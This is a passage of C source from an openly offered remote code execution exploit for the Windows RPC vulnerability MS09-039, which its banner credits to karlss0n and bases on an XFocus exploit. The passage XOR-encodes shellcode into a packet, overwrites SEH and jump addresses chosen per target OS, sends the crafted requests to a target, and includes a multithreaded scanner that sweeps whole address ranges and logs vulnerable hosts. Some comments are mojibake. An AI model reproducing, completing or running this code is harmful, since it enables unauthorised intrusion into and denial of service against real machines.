  426. for(int i=0;i<sz;i++) 
  427. rawData[i+0x71]=shellcode[i]; 
  428. // fp=fopen("badfile.exe","rb"); 
  429. // unsigned int sz1=fread(shellcode,1,50000,fp); 
  430. // fclose(fp); 
  431. // for(i=0;i<sz1;i++) 
  432. // rawData[i+0x240]=shellcode; 
  433.  
  434. // fp=fopen("pac","wb"); 
  435. // fwrite(rawData,1,1036,fp); 
  436. // fclose(fp); 
  437.  
  438. // return; 
  439.  
  440.  
  441. //∩┐╜∩┐╜αÑñ ΓѼ ∩┐╜ ∩┐╜ ∩┐╜∩┐╜∩┐╜∩┐╜∩┐╜∩┐╜∩┐╜ ∩┐╜ φ»¿ΦѼ  ∩┐╜∩┐╜∩┐╜∩┐╜ ßó«φí«φñ¡φ«ú∩┐╜ HEAP'a 
  442. // DWORD heap=0x00180000; 
  443. // int k=vers; 
  444. // vers=1; 
  445. // *(DWORD *)(rawData+0xae)=target_os[vers].heap; 
  446. *(DWORD *)(rawData+0x71+0x1e)=target_os[vers].heap; 
  447. //∩┐╜φÑ»∩┐╜∩┐╜∩┐╜ ∩┐╜πª¡∩┐╜ ∩┐╜᫬∩┐╜∩┐╜∩┐╜∩┐╜∩┐╜∩┐╜ ∩┐╜ ∩┐╜ φ¬«∩┐╜, φñ½∩┐╜ Γ«ú∩┐╜ ∩┐╜Γ«í∩┐╜ φ»«∩┐╜∩┐╜∩┐╜∩┐╜∩┐╜∩┐╜ ∩┐╜πª¡∩┐╜∩┐╜ ∩┐╜  
  448. XOR(rawData,0x71,sz,0x99); 
  449. // XOR(rawData,0x240,sz1,0x99); 
  450. //∩┐╜ ∩┐╜ φªÑ ∩┐╜ ∩┐╜ ∩┐╜πª¡∩┐╜ ∩┐╜ φ»¿∩┐╜ ∩┐╜∩┐╜ ∩┐╜πª¡∩┐╜∩┐╜ ∩┐╜ ∩┐╜ SEH ∩┐╜ JMP 
  451. DWORD seh=target_os[vers].seh; 
  452. DWORD jmp=target_os[vers].jmp; 
  453. *(DWORD *)(rawData+0x22a)=jmp; 
  454. *(DWORD *)(rawData+0x22e)=seh; 
  455. // *(WORD *)(rawData+0x62)=sz+sz1+(0x240-(0x71+sz)); 
  456. *(WORD *)(rawData+0x62)=sz; 
  457.  
  458.  
  459. memcpy(buf2,request1,sizeof(request1)); 
  460. *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(rawData)/2; 
  461. *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(rawData)/2; 
  462. memcpy(buf2+len1,request2,sizeof(request2)); 
  463. len1=len1+sizeof(request2); 
  464.  
  465. memcpy(buf2+len1,rawData,sizeof(rawData)); 
  466. len1=len1+sizeof(rawData); 
  467.  
  468. memcpy(buf2+len1,request3,sizeof(request3)); 
  469. len1=len1+sizeof(request3); 
  470. memcpy(buf2+len1,request4,sizeof(request4)); 
  471. len1=len1+sizeof(request4); 
  472. *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+len-0xc; 
  473.  
  474. *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+len-0xc; 
  475. *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+len-0xc; 
  476. *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+len-0xc; 
  477. *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+len-0xc; 
  478. *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+len-0xc; 
  479. *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+len-0xc; 
  480. *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+len-0xc; 
  481.  
  482. closesocket(sock); 
  483. if(atack) 
  485. sock=socket(2,1,0); 
  486. WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL); 
  487.  
  488. if (send(sock,(const char *)bindstr,sizeof(bindstr),0)==SOCKET_ERROR) 
  490. printf("%s - send failed %d\n",ip,WSAGetLastError()); 
  491. return 0; 
  493. else {printf("%s - send exploit to %s\n",ip,target_os[vers].target);} 
  494.  
  495. len=recv(sock,(char *)buf1,1000,NULL); 
  496. bool ft=1; 
  497. if(ft) 
  499. int i=0; 
  500. while(1) 
  502. if (send(sock,(const char *)buf2,len1,0)==SOCKET_ERROR) 
  504. printf("\nSend failed.Error:%d\n",WSAGetLastError()); 
  505. return 0; 
  507. else 
  509. printf("\r%d",++i); 
  511. //Sleep(1000); 
  514. send(sock,(const char *)buf2,len1,0); 
  515. closesocket(sock); 
  517. else fprintf(fp1,"%s %s\n",target_os[vers].target,ip); 
  518. // fp=fopen("pac","wb"); 
  519. // fwrite(rawData,1,1036,fp); 
  520. // fclose(fp); 
  522. unsigned long thread_count=0; 
  523. char adr[200]; 
  524.  
  525. DWORD WINAPI ThreadProc( 
  526. LPVOID lpParameter // thread data 
  529. thread_count++; 
  530. attack(adr,0); 
  531.  
  532. thread_count--; 
  533. return 0; 
  535.  
  536. int main(int argc,char ** argv) 
  538. //printf("%x %x",OF_READWRITE,GETSTRCS(argv[1])); 
  539. //return; 
  540. //HFILE hf=_lopen("asd123",0x1001); 
  541. //printf("%x",hf); 
  542. //_lclose(hf); 
  543. //return; 
  544.  
  545. if(argc!=2){
  546. fprintf(stderr, "RPC universal exploit. Exploit MS09-039 vulnerability\n"
  547. "unpatched host - to codee xecution\n"
  548. "patched host - to DoS\n"
  549. "based on original XFocus RPCDCOM2 exploit\n"
  550. "modification and shellcode (c) by karlss0n\n"
  551. "downloaded on www.k-otik.com\n"
  552. "\n"
  553. "usage: %s <target_ip>\n",
  554. argv[0]);
  555. return 10;
  556. }
  557.  
  558. WSADATA wsaData; 
  559.  
  560. int wVersionRequested; 
  561. wVersionRequested = MAKEWORD( 2, 2 ); 
  562.  
  563. int err = WSAStartup( wVersionRequested, &wsaData ); 
  564. if ( err != 0 ) { 
  565. /* Tell the user that we could not find a usable */ 
  566. /* WinSock DLL. */ 
  567. return 1; 
  569.  
  570.  
  571. if(strchr(argv[1],'.')) 
  573. attack(argv[1],1); 
  574. Sleep(20000); 
  575. return 2; 
  577. int cb=1,db=1; 
  578. cb=atoi(argv[3]); 
  579. db=atoi(argv[4]); 
  580. long tm=atoi(argv[5]); 
  581. for(int c=cb;c<255;c++) 
  583. for(int d=db;d<255;d++) 
  585. sprintf(adr,"%s.%s.%d.%d",argv[1],argv[2],c,d); 
  586. if(thread_count>tm) while(thread_count>tm) Sleep(100); 
  587. CreateThread(NULL,0,&ThreadProc,(void *)"",0,NULL); 
  588. Sleep(10); 
  589. fflush(fp1); 
  592. Sleep(60000); 
  593. fclose(fp1); 
  594. return 0;
  595.  
  597.  
  598.